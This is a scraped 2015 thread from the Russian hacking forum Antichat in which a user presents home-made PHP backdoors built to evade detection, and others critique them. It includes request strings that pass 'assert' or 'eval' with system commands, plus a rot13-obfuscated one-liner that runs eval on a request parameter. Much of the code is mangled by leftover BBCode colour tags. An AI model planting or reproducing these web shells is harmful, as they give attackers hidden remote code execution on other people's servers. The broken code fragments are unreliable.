Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   [PHP] BackDoor's (https://forum.antichat.xyz/showthread.php?t=424054)

M.Billar 10.04.2015 09:39
1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно. Вчера придумал

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Цитата:
Сообщение от Using
Using said:
index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');
Могу поздравить себя с первым собственным пхп-бекдором.

2) Используем фичу обратных кавычек. Исполняет код передаваемый в параметре = названию переменной.

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=@[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][((++[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"])+([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++ ))].=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=++[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][--[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]>>[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]].=(([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]]).([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]] =([/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]>>[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]]).([/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]]^[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]
[/COLOR][/COLOR
Цитата:
Сообщение от Using
Using said:
file.php?0=НАЗВАНИЕ_ФУНКЦИИ&1=ДА НЫЕ ДЛЯ ФУНКЦИИ
file.php?0=assert&1=phpinfo();
file.php?0=eval&1=echo 1;
4) PHP-Backdoor, спасибо тебе, типизация которой нет

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR
Цитата:
Сообщение от Using
Using said:
file.php?f=assert&c=phpinfo();
file.php?f=eval&c=echo 1;

faza02 10.04.2015 11:59
бэкдор, скорее, должен быть незаметным и сливаться с остальным кодом, чем быть самым коротким, или быть только из символов скобок. то есть всегда по ситуации

BigBear 10.04.2015 20:55
Ужасно. Практически ничего нового.

1 способ интересен, но первый же попашийся анализатор кода спалит ваш assert со всеми потрохами.

2 способ описан Raz0r аж в 2008 году

http://raz0r.name/releases/mega-reli...orotkij-shell/

3 способ - обычная обфускация. Таких динамических бэкдоров понаделать очень просто.

4 способ - классика. Им пользуются давно и это, наверное, самый распространённый тип бэкдора на сегодняшний день.

M.Billar 10.04.2015 21:15
Цитата:
Сообщение от BigBear
BigBear said:

Ужасно. Практически ничего нового.
1 способ интересен, но первый же попашийся анализатор кода спалит ваш
assert
со всеми потрохами.
Не против если объединю с классикой?)

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'large'[/COLOR][COLOR="#007700"]]([/COLOR][COLOR="#0000BB"]str_rot13[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'riny($_ERDHRFG["pbqr"]);'[/COLOR][COLOR="#007700"]));
[/COLOR][/COLOR
Цитата:
Сообщение от None
index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');


Время: 20:37